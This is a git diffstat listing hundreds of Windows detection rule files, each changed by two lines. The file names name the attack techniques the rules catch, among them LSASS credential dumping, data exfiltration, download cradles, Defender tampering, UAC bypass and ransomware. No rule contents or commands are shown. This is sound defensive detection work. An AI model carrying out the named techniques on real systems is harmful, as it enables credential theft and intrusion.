 .../powershell_script/posh_ps_susp_clear_eventlog.yml | 2 +-
 .../powershell/powershell_script/posh_ps_susp_download.yml | 2 +-
 .../posh_ps_susp_export_pfxcertificate.yml | 2 +- 
.../powershell_script/posh_ps_susp_follina_execution.yml | 2 +-
 .../powershell_script/posh_ps_susp_getprocess_lsass.yml | 2 +-
 .../powershell_script/posh_ps_susp_invocation_generic.yml | 2 +-
 .../powershell_script/posh_ps_susp_invocation_specific.yml | 2 +-
 .../powershell_script/posh_ps_susp_keylogger_activity.yml | 2 +-
 .../powershell/powershell_script/posh_ps_susp_keywords.yml | 2 +-
 .../powershell_script/posh_ps_susp_proxy_scripts.yml | 2 +-
 .../posh_ps_susp_service_dacl_modification_set_service.yml | 2 +-
 .../powershell_script/posh_ps_susp_write_eventlog.yml | 2 +-
 .../posh_ps_tamper_defender_remove_mppreference.yml | 2 +-
 .../powershell_script/posh_ps_user_discovery_get_aduser.yml | 2 +-
 .../posh_ps_using_set_service_to_hide_services.yml | 2 +-
 .../posh_ps_wmi_unquoted_service_search.yml | 2 +-
 .../proc_access_win_cobaltstrike_bof_injection_pattern.yml | 2 +-
 .../proc_access_win_cred_dump_lsass_access.yml | 2 +-
 .../proc_access_win_direct_syscall_ntopenprocess.yml | 2 +-
 .../process_access/proc_access_win_hack_sysmonente.yml | 2 +-
 .../proc_access_win_littlecorporal_generated_maldoc.yml | 2 +-
 .../proc_access_win_lsass_memdump_evasion.yml | 2 +-
 .../proc_access_win_lsass_memdump_indicators.yml | 2 +-
 .../process_access/proc_access_win_lsass_werfault.yml | 2 +-
 .../proc_access_win_malware_verclsid_shellcode.yml | 2 +-
 .../proc_access_win_rare_proc_access_lsass.yml | 2 +-
 .../proc_access_win_susp_proc_access_lsass.yml | 2 +-
 .../proc_access_win_susp_proc_access_lsass_susp_source.yml | 2 +-
 .../proc_access_win_uac_bypass_wow64_logger.yml | 2 +-
 .../proc_creation_win_aadinternals_cmdlets_execution.yml | 2 +-
 .../proc_creation_win_advanced_port_scanner.yml | 2 +-
 ...roc_creation_win_anydesk_execution_from_susp_folders.yml | 2 +-
 .../proc_creation_win_anydesk_piped_password_via_cli.yml | 2 +-
 .../proc_creation_win_apt_apt29_thinktanks.yml | 2 +-
 .../process_creation/proc_creation_win_apt_babyshark.yml | 2 +-
 .../proc_creation_win_apt_bear_activity_gtr19.yml | 2 +- 
.../process_creation/proc_creation_win_apt_bluemashroom.yml | 2 +-
 .../process_creation/proc_creation_win_apt_chafer_mar18.yml | 2 +-
 .../process_creation/proc_creation_win_apt_cloudhopper.yml | 2 +-
 .../process_creation/proc_creation_win_apt_elise.yml | 2 +-
 .../proc_creation_win_apt_emissarypanda_sep19.yml | 2 +-
 .../proc_creation_win_apt_equationgroup_dll_u_load.yml | 2 +-
 .../proc_creation_win_apt_evilnum_jul20.yml | 2 +-
 .../proc_creation_win_apt_greenbug_may20.yml | 2 +-
 .../process_creation/proc_creation_win_apt_hafnium.yml | 2 +-
 .../proc_creation_win_apt_hurricane_panda.yml | 2 +-
 .../proc_creation_win_apt_judgement_panda_gtr19.yml | 2 +-
 .../proc_creation_win_apt_lazarus_activity_dec20.yml | 2 +-
 .../proc_creation_win_apt_lazarus_loader.yml | 2 +-
 .../process_creation/proc_creation_win_apt_mercury.yml | 2 +-
 .../process_creation/proc_creation_win_apt_mustangpanda.yml | 2 +-
 .../process_creation/proc_creation_win_apt_revil_kaseya.yml | 2 +-
 .../process_creation/proc_creation_win_apt_slingshot.yml | 2 +-
 .../process_creation/proc_creation_win_apt_sofacy.yml | 2 +-
 .../process_creation/proc_creation_win_apt_ta17_293a_ps.yml | 2 +-
 .../proc_creation_win_apt_ta505_dropper.yml | 2 +-
 .../process_creation/proc_creation_win_apt_taidoor.yml | 2 +-
 .../proc_creation_win_apt_turla_comrat_may20.yml | 2 +-
 .../process_creation/proc_creation_win_apt_unc2452_cmds.yml | 2 +-
 .../process_creation/proc_creation_win_apt_unc2452_ps.yml | 2 +-
 .../proc_creation_win_apt_winnti_mal_hk_jan20.yml | 2 +-
 .../proc_creation_win_apt_winnti_pipemon.yml | 2 +-
 .../process_creation/proc_creation_win_apt_wocao.yml | 2 +-
 .../process_creation/proc_creation_win_apt_zxshell.yml | 2 +-
 .../proc_creation_win_archiver_iso_phishing.yml | 2 +-
 .../proc_creation_win_attrib_system_susp_paths.yml | 2 +-
 .../proc_creation_win_bad_opsec_sacrificial_processes.yml | 2 +-
 .../proc_creation_win_bitsadmin_download_susp_domain.yml | 2 +-
 .../proc_creation_win_bitsadmin_download_susp_ext.yml | 2 +- 
.../proc_creation_win_bitsadmin_download_susp_ip.yml | 2 +-
 ...oc_creation_win_bitsadmin_download_susp_targetfolder.yml | 2 +-
 ...reation_win_bitsadmin_download_uncommon_targetfolder.yml | 2 +-
 .../proc_creation_win_browser_remote_debugging.yml | 2 +-
 .../process_creation/proc_creation_win_c2_sliver.yml | 2 +-
 .../proc_creation_win_certutil_ntlm_coercion.yml | 2 +-
 .../proc_creation_win_change_default_file_assoc_susp.yml | 2 +-
 .../process_creation/proc_creation_win_chisel_usage.yml | 2 +-
 .../proc_creation_win_chromium_headless_debugging.yml | 2 +-
 .../proc_creation_win_cmd_redirection_susp_folder.yml | 2 +-
 .../process_creation/proc_creation_win_cmdkey_recon.yml | 2 +-
 .../proc_creation_win_cmstp_com_object_access.yml | 2 +-
 .../proc_creation_win_cobaltstrike_process_patterns.yml | 2 +-
 ...proc_creation_win_commandline_path_traversal_evasion.yml | 2 +-
 .../proc_creation_win_computer_discovery_get_adcomputer.yml | 2 +-
 .../proc_creation_win_conhost_path_traversal.yml | 2 +-
 .../proc_creation_win_copy_browser_data.yml | 2 +-
 .../proc_creation_win_copy_dmp_from_share.yml | 2 +-
 .../proc_creation_win_crackmapexec_patterns.yml | 2 +-
 .../proc_creation_win_creative_cloud_node_abuse.yml | 2 +-
 .../process_creation/proc_creation_win_crime_fireball.yml | 2 +-
 .../proc_creation_win_crime_maze_ransomware.yml | 2 +-
 .../proc_creation_win_crime_snatch_ransomware.yml | 2 +-
 .../proc_creation_win_crypto_mining_monero.yml | 2 +-
 .../process_creation/proc_creation_win_curl_download.yml | 2 +-
 .../process_creation/proc_creation_win_dinjector.yml | 2 +-
 .../process_creation/proc_creation_win_disable_service.yml | 2 +-
 .../proc_creation_win_dll_sideload_vmware_xfer.yml | 2 +-
 .../proc_creation_win_dns_serverlevelplugindll.yml | 2 +-
 .../proc_creation_win_driverquery_recon.yml | 2 +-
 .../proc_creation_win_driverquery_usage.yml | 2 +-
 .../proc_creation_win_dsacls_abuse_permissions.yml | 2 +-
 .../proc_creation_win_dsacls_password_spray.yml | 2 +- 
.../proc_creation_win_dumpstack_log_evasion.yml | 2 +- .../proc_creation_win_email_exfil_via_powershell.yml | 2 +- ...oc_creation_win_enable_susp_windows_optional_feature.yml | 2 +- .../proc_creation_win_enumeration_for_credentials_cli.yml | 2 +- .../proc_creation_win_etw_trace_evasion.yml | 2 +- .../proc_creation_win_exfil_data_via_cli.yml | 2 +- .../proc_creation_win_exploit_cve_2015_1641.yml | 2 +- .../proc_creation_win_exploit_cve_2017_0261.yml | 2 +- .../proc_creation_win_exploit_cve_2017_11882.yml | 2 +- .../proc_creation_win_exploit_cve_2017_8759.yml | 2 +- .../proc_creation_win_exploit_cve_2019_1378.yml | 2 +- .../proc_creation_win_exploit_cve_2019_1388.yml | 2 +- .../proc_creation_win_exploit_cve_2020_10189.yml | 2 +- .../proc_creation_win_exploit_cve_2020_1350.yml | 2 +- .../proc_creation_win_exploit_lpe_cve_2021_41379.yml | 2 +- .../proc_creation_win_exploit_systemnightmare.yml | 2 +- .../process_creation/proc_creation_win_findstr_lsass.yml | 2 +- .../proc_creation_win_findstr_recon_everyone.yml | 2 +- .../proc_creation_win_get_localgroup_member_recon.yml | 2 +- .../process_creation/proc_creation_win_gmer_execution.yml | 2 +- .../proc_creation_win_gpg4win_susp_usage.yml | 2 +- .../process_creation/proc_creation_win_hack_adcspwn.yml | 2 +- .../process_creation/proc_creation_win_hack_bloodhound.yml | 2 +- .../proc_creation_win_hack_cube0x0_tools.yml | 2 +- .../process_creation/proc_creation_win_hack_dumpert.yml | 2 +- .../process_creation/proc_creation_win_hack_htran.yml | 2 +- .../process_creation/proc_creation_win_hack_inveigh.yml | 2 +- .../process_creation/proc_creation_win_hack_krbrelay.yml | 2 +- .../process_creation/proc_creation_win_hack_krbrelayup.yml | 2 +- .../process_creation/proc_creation_win_hack_rubeus.yml | 2 +- .../process_creation/proc_creation_win_hack_safetykatz.yml | 2 +- .../proc_creation_win_hack_secutyxploded.yml | 2 +- .../process_creation/proc_creation_win_hack_sharpersist.yml | 2 +- .../proc_creation_win_hack_sharpldapwhoami.yml 
| 2 +- .../process_creation/proc_creation_win_hack_sysmoneop.yml | 2 +- .../windows/process_creation/proc_creation_win_hack_wce.yml | 2 +- .../proc_creation_win_hacktool_imphashes.yml | 2 +- .../process_creation/proc_creation_win_handlekatz.yml | 2 +- .../process_creation/proc_creation_win_hh_chm_http.yml | 2 +- .../proc_creation_win_hktl_createminidump.yml | 2 +- .../proc_creation_win_hktl_uacme_uac_bypass.yml | 2 +- .../process_creation/proc_creation_win_hwp_exploits.yml | 2 +- .../proc_creation_win_iis_appcmd_susp_module_install.yml | 2 +- .../proc_creation_win_iis_appcmd_susp_rewrite_rule.yml | 2 +- .../proc_creation_win_imaging_devices_unusual_parents.yml | 2 +- .../proc_creation_win_impacket_compiled_tools.yml | 2 +- .../proc_creation_win_import_cert_susp_locations.yml | 2 +- .../proc_creation_win_import_module_susp_dirs.yml | 2 +- .../proc_creation_win_inline_base64_mz_header.yml | 2 +- .../proc_creation_win_inline_win_api_access.yml | 2 +- .../proc_creation_win_install_reg_debugger_backdoor.yml | 2 +- rules/windows/process_creation/proc_creation_win_iox.yml | 2 +- .../process_creation/proc_creation_win_lolbin_adplus.yml | 2 +- .../proc_creation_win_lolbin_agentexecutor.yml | 2 +- .../proc_creation_win_lolbin_agentexecutor_susp_usage.yml | 2 +- .../proc_creation_win_lolbin_certoc_download.yml | 2 +- .../proc_creation_win_lolbin_customshellhost.yml | 2 +- ...roc_creation_win_lolbin_device_credential_deployment.yml | 2 +- .../proc_creation_win_lolbin_dll_sideload_xwizard.yml | 2 +- .../proc_creation_win_lolbin_execution_via_winget.yml | 2 +- .../process_creation/proc_creation_win_lolbin_forfiles.yml | 2 +- .../proc_creation_win_lolbin_ieexec_download.yml | 2 +- .../proc_creation_win_lolbin_installutil_download.yml | 2 +- .../proc_creation_win_lolbin_kavremover.yml | 2 +- .../proc_creation_win_lolbin_launch_vsdevshell.yml | 2 +- .../process_creation/proc_creation_win_lolbin_mftrace.yml | 2 +- .../proc_creation_win_lolbin_msdt_answer_file.yml | 2 +- 
.../proc_creation_win_lolbin_msohtmed_download.yml | 2 +- .../proc_creation_win_lolbin_mspub_download.yml | 2 +- .../proc_creation_win_lolbin_openconsole.yml | 2 +- .../process_creation/proc_creation_win_lolbin_pcalua.yml | 2 +- .../proc_creation_win_lolbin_pcwrun_follina.yml | 2 +- .../proc_creation_win_lolbin_presentationhost.yml | 2 +- .../proc_creation_win_lolbin_presentationhost_download.yml | 2 +- .../process_creation/proc_creation_win_lolbin_regasm.yml | 2 +- .../proc_creation_win_lolbin_register_app.yml | 2 +- .../proc_creation_win_lolbin_scriptrunner.yml | 2 +- .../process_creation/proc_creation_win_lolbin_sftp.yml | 2 +- .../proc_creation_win_lolbin_sideload_link_binary.yml | 2 +- .../process_creation/proc_creation_win_lolbin_sigverif.yml | 2 +- .../process_creation/proc_creation_win_lolbin_squirrel.yml | 2 +- .../proc_creation_win_lolbin_susp_acccheckconsole.yml | 2 +- .../proc_creation_win_lolbin_susp_certreq_download.yml | 2 +- .../proc_creation_win_lolbin_susp_dxcap.yml | 2 +- .../proc_creation_win_lolbin_susp_grpconv.yml | 2 +- .../process_creation/proc_creation_win_lolbin_type.yml | 2 +- .../proc_creation_win_lolbin_vsiisexelauncher.yml | 2 +- .../process_creation/proc_creation_win_lolbin_winword.yml | 2 +- .../proc_creation_win_mailboxexport_share.yml | 2 +- .../process_creation/proc_creation_win_mal_adwind.yml | 2 +- .../proc_creation_win_mal_darkside_ransomware.yml | 2 +- .../proc_creation_win_mal_hermetic_wiper_activity.yml | 2 +- .../proc_creation_win_malicious_cmdlets.yml | 2 +- .../process_creation/proc_creation_win_malware_conti.yml | 2 +- .../proc_creation_win_malware_conti_7zip.yml | 2 +- .../proc_creation_win_malware_conti_shadowcopy.yml | 2 +- .../process_creation/proc_creation_win_malware_dridex.yml | 2 +- .../process_creation/proc_creation_win_malware_dtrack.yml | 2 +- .../process_creation/proc_creation_win_malware_emotet.yml | 2 +- .../process_creation/proc_creation_win_malware_formbook.yml | 2 +- 
.../process_creation/proc_creation_win_malware_notpetya.yml | 2 +- .../process_creation/proc_creation_win_malware_qbot.yml | 2 +- .../process_creation/proc_creation_win_malware_ryuk.yml | 2 +- .../proc_creation_win_malware_script_dropper.yml | 2 +- .../proc_creation_win_malware_trickbot_wermgr.yml | 2 +- .../process_creation/proc_creation_win_malware_wannacry.yml | 2 +- rules/windows/process_creation/proc_creation_win_msdt.yml | 2 +- .../proc_creation_win_msdt_susp_cab_options.yml | 2 +- .../proc_creation_win_msedge_minimized_download.yml | 2 +- .../proc_creation_win_msexchange_transport_agent.yml | 2 +- .../process_creation/proc_creation_win_mshta_http.yml | 2 +- .../proc_creation_win_msiexec_install_remote.yml | 2 +- .../proc_creation_win_net_default_accounts_manipulation.yml | 2 +- .../process_creation/proc_creation_win_net_recon.yml | 2 +- .../proc_creation_win_net_user_add_never_expire.yml | 2 +- .../process_creation/proc_creation_win_netsh_port_fwd.yml | 2 +- .../proc_creation_win_netsh_port_fwd_3389.yml | 2 +- .../proc_creation_win_new_network_provider.yml | 2 +- .../process_creation/proc_creation_win_node_abuse.yml | 2 +- rules/windows/process_creation/proc_creation_win_nps.yml | 2 +- .../proc_creation_win_nslookup_poweshell_download.yml | 2 +- .../proc_creation_win_obfuscated_ip_download.yml | 2 +- .../proc_creation_win_obfuscated_ip_via_cli.yml | 2 +- .../proc_creation_win_office_dir_traversal_cli.yml | 2 +- .../process_creation/proc_creation_win_office_shell.yml | 2 +- .../proc_creation_win_office_svchost_child.yml | 2 +- .../process_creation/proc_creation_win_outlook_shell.yml | 2 +- .../proc_creation_win_pdqdeploy_runner_susp_children.yml | 2 +- .../proc_creation_win_perl_inline_command_execution.yml | 2 +- .../proc_creation_win_persistence_typed_paths.yml | 2 +- .../proc_creation_win_php_inline_command_execution.yml | 2 +- .../proc_creation_win_plugx_susp_exe_locations.yml | 2 +- .../proc_creation_win_powershell_add_windows_capability.yml | 2 +- 
.../proc_creation_win_powershell_amsi_null_bits_bypass.yml | 2 +- ...proc_creation_win_powershell_base64_frombase64string.yml | 2 +- .../proc_creation_win_powershell_base64_iex.yml | 2 +- .../proc_creation_win_powershell_base64_invoke.yml | 2 +- .../proc_creation_win_powershell_base64_mppreference.yml | 2 +- ...ation_win_powershell_base64_reflective_assembly_load.yml | 2 +- .../proc_creation_win_powershell_base64_shellcode.yml | 2 +- .../proc_creation_win_powershell_base64_wmi_classes.yml | 2 +- ...roc_creation_win_powershell_defender_disable_feature.yml | 2 +- .../proc_creation_win_powershell_defender_exclusion.yml | 2 +- .../proc_creation_win_powershell_download_patterns.yml | 2 +- .../proc_creation_win_powershell_frombase64string.yml | 2 +- .../proc_creation_win_powershell_get_clipboard.yml | 2 +- .../proc_creation_win_powershell_public_folder.yml | 2 +- .../proc_creation_win_powershell_susp_download_patterns.yml | 2 +- ...roc_creation_win_powershell_susp_parameter_variation.yml | 2 +- .../proc_creation_win_powertool_execution.yml | 2 +- .../proc_creation_win_proc_dump_createdump.yml | 2 +- .../proc_creation_win_proc_dump_dumpminitool.yml | 2 +- .../proc_creation_win_proc_dump_rdrleakdiag.yml | 2 +- .../proc_creation_win_proc_dump_susp_dumpminitool.yml | 2 +- .../windows/process_creation/proc_creation_win_procdump.yml | 2 +- .../process_creation/proc_creation_win_procdump_evasion.yml | 2 +- .../proc_creation_win_process_dump_rundll32_comsvcs.yml | 2 +- .../proc_creation_win_proxy_execution_wuauclt.yml | 2 +- .../process_creation/proc_creation_win_psexesvc_start.yml | 2 +- .../proc_creation_win_pua_defendercheck.yml | 2 +- .../process_creation/proc_creation_win_pua_seatbelt.yml | 2 +- .../proc_creation_win_public_folder_parent.yml | 2 +- .../proc_creation_win_purplesharp_indicators.yml | 2 +- .../proc_creation_win_python_inline_command_execution.yml | 2 +- .../process_creation/proc_creation_win_quarks_pwdump.yml | 2 +- 
.../proc_creation_win_query_session_exfil.yml | 2 +- .../process_creation/proc_creation_win_ransom_blackbyte.yml | 2 +- ..._creation_win_raspberry_robin_single_dot_ending_file.yml | 2 +- .../proc_creation_win_rdp_hijack_shadowing.yml | 2 +- .../proc_creation_win_redirect_local_admin_share.yml | 2 +- .../process_creation/proc_creation_win_reg_add_run_key.yml | 2 +- .../process_creation/proc_creation_win_reg_add_safeboot.yml | 2 +- .../proc_creation_win_reg_defender_tampering.yml | 2 +- .../proc_creation_win_reg_delete_safeboot.yml | 2 +- .../proc_creation_win_reg_delete_services.yml | 2 +- .../process_creation/proc_creation_win_reg_enable_rdp.yml | 2 +- .../proc_creation_win_reg_lsa_ppl_protection_disabled.yml | 2 +- .../proc_creation_win_renamed_binary_highly_relevant.yml | 2 +- .../proc_creation_win_renamed_browsercore.yml | 2 +- .../process_creation/proc_creation_win_renamed_msdt.yml | 2 +- .../proc_creation_win_renamed_netsupport_rat.yml | 2 +- .../proc_creation_win_renamed_office_processes.yml | 2 +- .../process_creation/proc_creation_win_renamed_plink.yml | 2 +- .../process_creation/proc_creation_win_renamed_procdump.yml | 2 +- ...proc_creation_win_renamed_rundll32_dllregisterserver.yml | 2 +- .../process_creation/proc_creation_win_renamed_rurat.yml | 2 +- .../process_creation/proc_creation_win_renamed_sdelete.yml | 2 +- .../process_creation/proc_creation_win_renamed_whoami.yml | 2 +- .../process_creation/proc_creation_win_rpcss_anomalies.yml | 2 +- .../proc_creation_win_ruby_inline_command_execution.yml | 2 +- .../proc_creation_win_run_executable_invalid_extension.yml | 2 +- .../proc_creation_win_rundll32_unc_path.yml | 2 +- .../proc_creation_win_sc_delete_av_services.yml | 2 +- .../proc_creation_win_schtasks_appdata_local_system.yml | 2 +- .../proc_creation_win_schtasks_once_0000.yml | 2 +- ...eation_win_schtasks_powershell_windowsapps_execution.yml | 2 +- .../proc_creation_win_schtasks_reg_loader.yml | 2 +- 
.../process_creation/proc_creation_win_schtasks_system.yml | 2 +- .../proc_creation_win_screenconnect_anomaly.yml | 2 +- .../process_creation/proc_creation_win_selectmyparent.yml | 2 +- .../proc_creation_win_set_unsecure_powershell_policy.yml | 2 +- .../proc_creation_win_shadow_copies_deletion.yml | 2 +- .../proc_creation_win_sharp_chisel_usage.yml | 2 +- .../proc_creation_win_sharp_ldap_monitor.yml | 2 +- .../windows/process_creation/proc_creation_win_sharpup.yml | 2 +- .../proc_creation_win_shell_spawn_susp_program.yml | 2 +- .../process_creation/proc_creation_win_ssh_port_forward.yml | 2 +- .../proc_creation_win_ssh_rdp_tunneling.yml | 2 +- .../proc_creation_win_stickykey_like_backdoor.yml | 2 +- .../proc_creation_win_susp_3proxy_usage.yml | 2 +- .../process_creation/proc_creation_win_susp_7zip_dmp.yml | 2 +- .../proc_creation_win_susp_add_local_admin.yml | 2 +- .../proc_creation_win_susp_add_user_remote_desktop.yml | 2 +- .../process_creation/proc_creation_win_susp_advancedrun.yml | 2 +- .../proc_creation_win_susp_advancedrun_priv_user.yml | 2 +- .../proc_creation_win_susp_appx_execution.yml | 2 +- .../process_creation/proc_creation_win_susp_base64_load.yml | 2 +- .../proc_creation_win_susp_builtin_commands_recon.yml | 2 +- .../process_creation/proc_creation_win_susp_calc.yml | 2 +- .../proc_creation_win_susp_certutil_command.yml | 2 +- .../proc_creation_win_susp_certutil_encode.yml | 2 +- .../proc_creation_win_susp_clsid_foldername.yml | 2 +- .../proc_creation_win_susp_cmd_http_appdata.yml | 2 +- .../proc_creation_win_susp_cmd_shadowcopy_access.yml | 2 +- .../proc_creation_win_susp_codepage_switch.yml | 2 +- .../proc_creation_win_susp_command_flag_pattern.yml | 2 +- .../proc_creation_win_susp_commandline_chars.yml | 2 +- .../proc_creation_win_susp_compression_params.yml | 2 +- .../proc_creation_win_susp_control_dll_load.yml | 2 +- .../proc_creation_win_susp_copy_lateral_movement.yml | 2 +- .../proc_creation_win_susp_copy_system32.yml | 2 +- 
.../process_creation/proc_creation_win_susp_covenant.yml | 2 +- .../proc_creation_win_susp_crackmapexec_flags.yml | 2 +- .../windows/process_creation/proc_creation_win_susp_csc.yml | 2 +- .../process_creation/proc_creation_win_susp_csc_folder.yml | 2 +- .../process_creation/proc_creation_win_susp_csexec.yml | 2 +- .../proc_creation_win_susp_curl_download.yml | 2 +- .../proc_creation_win_susp_curl_fileupload.yml | 2 +- .../proc_creation_win_susp_dctask64_proc_inject.yml | 2 +- .../proc_creation_win_susp_desktopimgdownldr.yml | 2 +- .../proc_creation_win_susp_devinit_lolbin.yml | 2 +- .../proc_creation_win_susp_disable_eventlog.yml | 2 +- .../proc_creation_win_susp_disable_ie_features.yml | 2 +- .../proc_creation_win_susp_disable_raccine.yml | 2 +- .../proc_creation_win_susp_dllhost_no_cli.yml | 2 +- .../proc_creation_win_susp_double_extension.yml | 2 +- .../proc_creation_win_susp_download_office_domain.yml | 2 +- .../proc_creation_win_susp_dtrace_kernel_dump.yml | 2 +- .../proc_creation_win_susp_electron_app_children.yml | 2 +- .../proc_creation_win_susp_execution_path.yml | 2 +- .../proc_creation_win_susp_execution_path_webserver.yml | 2 +- .../proc_creation_win_susp_explorer_break_proctree.yml | 2 +- .../proc_creation_win_susp_explorer_nouaccheck.yml | 2 +- .../proc_creation_win_susp_finger_usage.yml | 2 +- .../process_creation/proc_creation_win_susp_format.yml | 2 +- .../process_creation/proc_creation_win_susp_git_clone.yml | 2 +- .../proc_creation_win_susp_guid_task_name.yml | 2 +- .../windows/process_creation/proc_creation_win_susp_gup.yml | 2 +- .../proc_creation_win_susp_gup_download.yml | 2 +- .../proc_creation_win_susp_gup_execution.yml | 2 +- .../proc_creation_win_susp_iis_module_registration.yml | 2 +- .../proc_creation_win_susp_image_missing.yml | 2 +- .../proc_creation_win_susp_invoke_webrequest_download.yml | 2 +- .../process_creation/proc_creation_win_susp_lsass_clone.yml | 2 +- .../proc_creation_win_susp_manageengine_pattern.yml | 2 +- 
.../proc_creation_win_susp_missing_spaces.yml | 2 +- .../proc_creation_win_susp_mofcomp_execution.yml | 2 +- .../proc_creation_win_susp_mpiexec_lolbin.yml | 2 +- .../proc_creation_win_susp_mshta_pattern.yml | 2 +- .../proc_creation_win_susp_mshtml_runhtmlapplication.yml | 2 +- .../process_creation/proc_creation_win_susp_msiexec_cwd.yml | 2 +- .../proc_creation_win_susp_msiexec_web_install.yml | 2 +- .../process_creation/proc_creation_win_susp_net_use.yml | 2 +- .../proc_creation_win_susp_netsupport_rat_exec_location.yml | 2 +- .../proc_creation_win_susp_new_kernel_driver_via_sc.yml | 2 +- .../proc_creation_win_susp_new_service_creation.yml | 2 +- .../process_creation/proc_creation_win_susp_ngrok_pua.yml | 2 +- .../proc_creation_win_susp_non_exe_image.yml | 2 +- .../proc_creation_win_susp_ntdll_type_redirect.yml | 2 +- .../process_creation/proc_creation_win_susp_ntds.yml | 2 +- .../proc_creation_win_susp_ntdsutil_usage.yml | 2 +- .../process_creation/proc_creation_win_susp_ntlmrelay.yml | 2 +- .../proc_creation_win_susp_office_token_search.yml | 2 +- .../proc_creation_win_susp_outlook_temp.yml | 2 +- .../process_creation/proc_creation_win_susp_parents.yml | 2 +- .../process_creation/proc_creation_win_susp_pchunter.yml | 2 +- .../process_creation/proc_creation_win_susp_ping_hex_ip.yml | 2 +- .../proc_creation_win_susp_plink_port_forward.yml | 2 +- .../process_creation/proc_creation_win_susp_plink_usage.yml | 2 +- ...proc_creation_win_susp_powershell_base64_encoded_cmd.yml | 2 +- .../proc_creation_win_susp_powershell_download_cradles.yml | 2 +- .../proc_creation_win_susp_powershell_download_iex.yml | 2 +- .../proc_creation_win_susp_powershell_empire_launch.yml | 2 +- ...oc_creation_win_susp_powershell_encoded_cmd_patterns.yml | 2 +- .../proc_creation_win_susp_powershell_getprocess_lsass.yml | 2 +- .../proc_creation_win_susp_powershell_iex_patterns.yml | 2 +- ...roc_creation_win_susp_powershell_invocation_specific.yml | 2 +- 
...oc_creation_win_susp_powershell_obfuscation_via_utf8.yml | 2 +- .../proc_creation_win_susp_powershell_sam_access.yml | 2 +- ...c_creation_win_susp_powershell_script_engine_parent_.yml | 2 +- .../proc_creation_win_susp_powershell_sub_processes.yml | 2 +- .../proc_creation_win_susp_powershell_webclient_casing.yml | 2 +- .../proc_creation_win_susp_pressynkey_lolbin.yml | 2 +- .../proc_creation_win_susp_procdump_lsass.yml | 2 +- .../proc_creation_win_susp_process_hacker.yml | 2 +- .../process_creation/proc_creation_win_susp_progname.yml | 2 +- .../process_creation/proc_creation_win_susp_ps_appdata.yml | 2 +- .../proc_creation_win_susp_ps_downloadfile.yml | 2 +- .../proc_creation_win_susp_ps_encoded_obfusc.yml | 2 +- .../proc_creation_win_susp_psexesvc_as_system.yml | 2 +- .../proc_creation_win_susp_psexesvc_renamed.yml | 2 +- ...proc_creation_win_susp_psexex_paexec_escalate_system.yml | 2 +- .../proc_creation_win_susp_psexex_paexec_flags.yml | 2 +- .../process_creation/proc_creation_win_susp_psloglist.yml | 2 +- .../proc_creation_win_susp_razorinstaller_explorer.yml | 2 +- .../proc_creation_win_susp_recon_network_activity.yml | 2 +- .../proc_creation_win_susp_reg_disable_sec_services.yml | 2 +- .../proc_creation_win_susp_regedit_trustedinstaller.yml | 2 +- .../proc_creation_win_susp_regsvr32_anomalies.yml | 2 +- .../proc_creation_win_susp_regsvr32_flags_anomaly.yml | 2 +- .../proc_creation_win_susp_regsvr32_http_pattern.yml | 2 +- .../proc_creation_win_susp_regsvr32_no_dll.yml | 2 +- .../proc_creation_win_susp_regsvr32_remote_share.yml | 2 +- .../proc_creation_win_susp_renamed_adfind.yml | 2 +- .../proc_creation_win_susp_renamed_createdump.yml | 2 +- .../proc_creation_win_susp_renamed_dctask64.yml | 2 +- .../proc_creation_win_susp_renamed_debugview.yml | 2 +- .../proc_creation_win_susp_renamed_paexec.yml | 2 +- .../proc_creation_win_susp_rundll32_by_ordinal.yml | 2 +- .../proc_creation_win_susp_rundll32_inline_vbs.yml | 2 +- 
...roc_creation_win_susp_rundll32_js_runhtmlapplication.yml | 2 +- .../proc_creation_win_susp_rundll32_keymgr.yml | 2 +- .../proc_creation_win_susp_rundll32_no_params.yml | 2 +- .../proc_creation_win_susp_rundll32_sys.yml | 2 +- .../proc_creation_win_susp_rurat_exec_location.yml | 2 +- .../proc_creation_win_susp_schtask_creation.yml | 2 +- .../proc_creation_win_susp_schtask_creation_temp_folder.yml | 2 +- .../proc_creation_win_susp_schtasks_change.yml | 2 +- .../proc_creation_win_susp_schtasks_delete.yml | 2 +- .../proc_creation_win_susp_schtasks_delete_all.yml | 2 +- .../proc_creation_win_susp_schtasks_env_folder.yml | 2 +- .../proc_creation_win_susp_schtasks_folder_combos.yml | 2 +- .../proc_creation_win_susp_schtasks_parent.yml | 2 +- .../proc_creation_win_susp_schtasks_pattern.yml | 2 +- .../proc_creation_win_susp_schtasks_schedule_type.yml | 2 +- ...proc_creation_win_susp_schtasks_schedule_type_system.yml | 2 +- .../proc_creation_win_susp_screenconnect_access.yml | 2 +- .../proc_creation_win_susp_script_exec_from_env_folder.yml | 2 +- .../proc_creation_win_susp_script_exec_from_temp.yml | 2 +- ...ation_win_susp_service_dacl_modification_set_service.yml | 2 +- .../process_creation/proc_creation_win_susp_service_dir.yml | 2 +- .../proc_creation_win_susp_service_path_modification.yml | 2 +- .../proc_creation_win_susp_service_stop.yml | 2 +- ..._creation_win_susp_servu_exploitation_cve_2021_35211.yml | 2 +- .../proc_creation_win_susp_servu_process_pattern.yml | 2 +- .../proc_creation_win_susp_shellexec_rundll_usage.yml | 2 +- .../proc_creation_win_susp_shimcache_flush.yml | 2 +- .../process_creation/proc_creation_win_susp_splwow64.yml | 2 +- .../process_creation/proc_creation_win_susp_svchost.yml | 2 +- .../proc_creation_win_susp_sysprep_appdata.yml | 2 +- .../proc_creation_win_susp_system_user_anomaly.yml | 2 +- .../proc_creation_win_susp_target_location_shell32.yml | 2 +- .../proc_creation_win_susp_taskmgr_localsystem.yml | 2 +- 
.../proc_creation_win_susp_taskmgr_parent.yml | 2 +- .../proc_creation_win_susp_trolleyexpress_procdump.yml | 2 +- .../proc_creation_win_susp_tscon_localsystem.yml | 2 +- .../proc_creation_win_susp_tscon_rdp_redirect.yml | 2 +- .../proc_creation_win_susp_uac_bypass_trustedpath.yml | 2 +- .../proc_creation_win_susp_userinit_child.yml | 2 +- .../proc_creation_win_susp_vbscript_unc2452.yml | 2 +- .../proc_creation_win_susp_volsnap_disable.yml | 2 +- .../proc_creation_win_susp_web_sysaidserver.yml | 2 +- .../process_creation/proc_creation_win_susp_wermgr.yml | 2 +- .../process_creation/proc_creation_win_susp_whoami.yml | 2 +- .../proc_creation_win_susp_whoami_anomaly.yml | 2 +- .../proc_creation_win_susp_whoami_as_param.yml | 2 +- .../proc_creation_win_susp_win_server_undocumented_rce.yml | 2 +- .../process_creation/proc_creation_win_susp_winrar_dmp.yml | 2 +- .../proc_creation_win_susp_winrar_execution.yml | 2 +- .../proc_creation_win_susp_wmic_eventconsumer_create.yml | 2 +- 